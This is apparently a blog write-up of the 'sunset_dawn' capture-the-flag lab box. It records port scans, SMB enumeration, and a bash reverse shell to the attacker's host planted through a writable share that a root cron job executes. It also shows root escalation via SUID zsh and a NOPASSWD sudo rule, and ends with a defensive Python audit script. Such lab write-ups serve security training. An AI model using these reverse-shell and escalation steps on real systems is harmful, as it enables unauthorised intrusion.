sunset_dawn Box

Information Gathering

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-12 13:21 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00035s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.46 seconds

Ports 80, 139, 445 and 3306 are open.

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap -sT -sV -sC -O -p80,139,445,3306 192.168.56.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-12 13:24 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00031s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 16
| Capabilities flags: 63486
| Some Capabilities: Support41Auth, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolNew, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsTransactions, InteractiveClient, DontAllowDatabaseTableColumn, FoundRows, IgnoreSigpipes, ODBCClient, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: &@QV;b_5*ouz)ZgzO[\=
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DAWN

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: dawn
| NetBIOS computer name: DAWN\x00
| Domain name: dawn
| FQDN: dawn.dawn
|_ System time: 2023-08-12T13:24:44-04:00
|_clock-skew: mean: 1h19m57s, deviation: 2h18m33s, median: -2s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-08-12T17:24:44
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds

Debian, running Apache httpd 2.4.38.

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap --top-ports 20 -sU 192.168.56.134
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 11:11 EDT
Nmap scan report for 192.168.56.134
Host is up (0.00032s latency).

PORT STATE SERVICE
53/udp open|filtered domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp closed nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.04 seconds

Nothing useful on the UDP ports.

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nmap --script=vuln -p80,139,445,3306 192.168.56.134
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-13 11:17 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.134
Host is up (0.00031s latency).

PORT STATE SERVICE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /logs/: Logs
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:84:97:E0 (Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service
| State: VULNERABLE
| The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 71.14 seconds

Port 80 exposes a logs directory.

FTP and MySQL

Try anonymous FTP login and passwordless MySQL login.

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ ftp 192.1.1.142
Connected to 192.1.1.142.
220 (vsFTPd 3.0.3)
Name (192.1.1.142:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ mysql -u root -h 192.168.56.134 -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.106' (using password: NO)

SMB

Try logging into SMB.

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo smbmap -H 192.168.56.134
[sudo] password for kali:
[+] IP: 192.168.56.134:445 Name: 192.168.56.134
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
ITDEPT READ ONLY PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ smbclient //192.168.56.134/ITDEPT
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Fri Aug 2 23:21:39 2019

7158264 blocks of size 1024. 0 blocks available
smb: \> pwd
Current directory is \\192.168.56.134\ITDEPT\

The share can be accessed but is empty. A quick test showed that files can be uploaded to it, but there is nothing further to use here, so on to the website first.

Directory Brute-forcing

While looking at the web page, start brute-forcing directories.

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo dirsearch -u http://192.168.56.134 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[sudo] password for kali:

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545

Output File: /root/.dirsearch/reports/192.168.56.134/_23-08-12_14-35-08.txt

Error Log: /root/.dirsearch/logs/errors-23-08-12_14-35-08.log

Target: http://192.168.56.134/

[14:35:08] Starting:
[14:35:12] 301 - 315B - /logs -> http://192.168.56.134/logs/
[14:35:25] 301 - 315B - /cctv -> http://192.168.56.134/cctv/
[14:38:41] 403 - 302B - /server-status

Visiting the logs and cctv directories: cctv is forbidden, while logs shows a file listing.

Brute-force the cctv directory once more so that nothing is missed.

All 404s and 403s, so the way in is not here.

Log File Disclosure

Back in the logs directory, the first few files are not accessible; management.log opens as a log, and judging by its content it was generated by pspy64. But there was nothing further in it. I hit a real wall here: the log file contained nothing of value.

At first I assumed it was an encoding problem, but switching between several encodings did not give the expected result. I also tried brute-forcing the FTP and MySQL passwords, which failed, and the page on port 80 had nothing of particular value either.

I was really at the end of my rope here, stuck for a whole day, and had no choice but to read a walkthrough. In other people's notes management.log does contain hints. Checking again, I found that my log was never updated with new entries, whereas in a normal run of this box the file is refreshed periodically. After restoring the snapshot and rebooting, then reopening the logs directory, management.log refreshed roughly every 3 minutes. That is how the box is supposed to behave...

Getting a Shell via the Cron Job

Somewhat exasperating, but carrying on; the rest of the process is much simpler. First, look at what the log file contains.

It should be a scheduled task, and the directory it references has the same name as the SMB share we just saw, which is interesting.

We can try uploading a malicious file with the same name into the ITDEPT share over SMB, then wait for the reverse shell.

┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ cat web-control
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.68.156.106/443 0>&1
smb: \> put web-control 
putting file web-control as \web-control (3.1 kb/s) (average 3.7 kb/s)
┌──(kali㉿kali)-[~/Downloads/dawn]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.134] 40794
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux dawn 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:84:97:e0 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.134/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 443sec preferred_lft 443sec
inet6 fe80::a00:27ff:fe84:97e0/64 scope link
valid_lft forever preferred_lft forever
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@dawn:~$

Basic Enumeration

www-data@dawn:~/html$ ls -alih
ls -alih
total 24K
16513 drwxr-xr-x 4 root root 4.0K Aug 3 2019 .
16512 drwxr-xr-x 3 root root 4.0K Aug 1 2019 ..
11120 drw------- 2 root root 4.0K Aug 1 2019 cctv
11145 -rw-r--r-- 1 root root 791 Aug 3 2019 index.html
9264 -rw-r--r-- 1 root root 1.0K Aug 3 2019 .index.html.swp
16523 drwxr-xr-x 2 root root 4.0K Aug 1 2019 logs
www-data@dawn:~/html$ cd cctv
cd cctv
bash: cd: cctv: Permission denied
www-data@dawn:~/html$ cat .index.html.swp
cat .index.html.swp
b0nano 3.2rootdawn/var/www/html/index.htmlU

www-data@dawn:/home/dawn$ sudo -l
sudo -l
Matching Defaults entries for www-data on dawn:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on dawn:
(root) NOPASSWD: /usr/bin/sudo

Privilege Escalation

Well, www-data can run sudo as root without a password. Just try sudo su?

www-data@dawn:/home/dawn$ /usr/bin/sudo su
/usr/bin/sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

Sorry, try again.
[sudo] password for www-data:

sudo: 3 incorrect password attempts

It asks for a password?? I don't get it.

I then tried all sorts of variations of this command, but every one of them asked for a password. I also tried the content of the hidden file in the web root as the password; that failed too.

www-data@dawn:/home/dawn$ sudo nano
sudo nano

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

[sudo] password for www-data:

Let's turn to cron jobs and SUID binaries instead.

www-data@dawn:/home/ganimedes$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@dawn:/home/ganimedes$ find / -type f -perm -04000 2>/dev/null
find / -type f -perm -04000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn

Well, zsh is SUID too. Is privilege escalation really this easy?

www-data@dawn:/home/ganimedes$ /usr/bin/zsh -p
/usr/bin/zsh -p
dawn# whoami
whoami
root
dawn# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
dawn# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:84:97:e0 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.134/24 brd 192.168.56.255 scope global dynamic enp0s3
valid_lft 506sec preferred_lft 506sec
inet6 fe80::a00:27ff:fe84:97e0/64 scope link
valid_lft forever preferred_lft forever
dawn# uname -a
uname -a
Linux dawn 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u1 (2019-07-19) x86_64 GNU/Linu

It really is. Done already; this is indeed an easy box, although the cron job not running and leaving the log file empty was painful. Finish with the flag.

dawn# cd /root                                                                 
cd /root
dawn# ls
ls
flag.txt pspy64
dawn# cat flag.txt
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!

flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}

Addendum

How to switch user via sudo without a password: the rule `(root) NOPASSWD: /usr/bin/sudo` lets www-data run sudo itself as root without a password, and the inner sudo, now running as root, does not prompt at all.

$ sudo sudo su
whoami
root
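As an added example (not part of the original write-up), the following Python audit checks a host for the three misconfigurations this box chains together: a cron job executing a script from a directory that unprivileged users can write to (the ITDEPT share), a setuid shell (zsh), and a NOPASSWD sudo rule whose target is sudo itself. The share path /srv/ITDEPT in the comments is an assumption; the page does not give the real path.

```python
import os

# Interactive shells and interpreters: setuid on any of these hands euid=0 to
# every local user (on this box: /usr/bin/zsh, entered with `zsh -p`).
SHELL_LIKE = {"zsh", "bash", "sh", "dash", "ksh", "python", "perl", "nano", "vim"}
# Files that carry the setuid bit on a stock Debian 10 install (the box's list
# minus zsh); anything beyond this baseline deserves a look.
BASELINE_SUID = {
    "/usr/bin/su", "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/bin/passwd",
    "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/gpasswd",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/sbin/mount.cifs",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
}


def unexpected_suid(paths):
    """Setuid files missing from the baseline; shells and interpreters sort first."""
    extra = [p for p in paths if p not in BASELINE_SUID]
    return sorted(extra, key=lambda p: (os.path.basename(p) not in SHELL_LIKE, p))


def risky_sudo_rules(sudo_l_output):
    """NOPASSWD rules (from `sudo -l` text) whose target can itself escalate.
    `(root) NOPASSWD: /usr/bin/sudo` qualifies: the inner sudo runs as root and
    root is never prompted, so `sudo sudo su` is a password-free root shell."""
    hits = []
    for line in sudo_l_output.splitlines():
        if "NOPASSWD:" not in line:
            continue
        for cmd in line.split("NOPASSWD:", 1)[1].split(","):
            cmd = cmd.strip()
            if cmd and os.path.basename(cmd.split()[0]) in SHELL_LIKE | {"sudo", "su"}:
                hits.append(cmd)
    return hits


def cron_scripts_in_writable_dirs(cron_entries, writable_dirs):
    """Cron commands whose script lives under a directory others can write to.
    cron_entries: (user, command) pairs from crontab or a pspy capture;
    writable_dirs: e.g. the directory behind the ITDEPT share (assumed /srv/ITDEPT)."""
    hits = []
    for user, command in cron_entries:
        script = command.split()[0]
        if not os.path.isabs(script):  # bare names resolve via PATH; out of scope here
            continue
        if any(os.path.commonpath([script, d]) == d for d in writable_dirs):
            hits.append((user, script))
    return hits
```

Feed it the `find / -type f -perm -04000` list and the `sudo -l` output captured above, plus the cron lines from /etc/crontab or the pspy log.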

sunset_dawn Box
https://i3eg1nner.github.io/2023/08/5d3dbe7ff791.html
Author: I3eg1nner
Published: August 13, 2023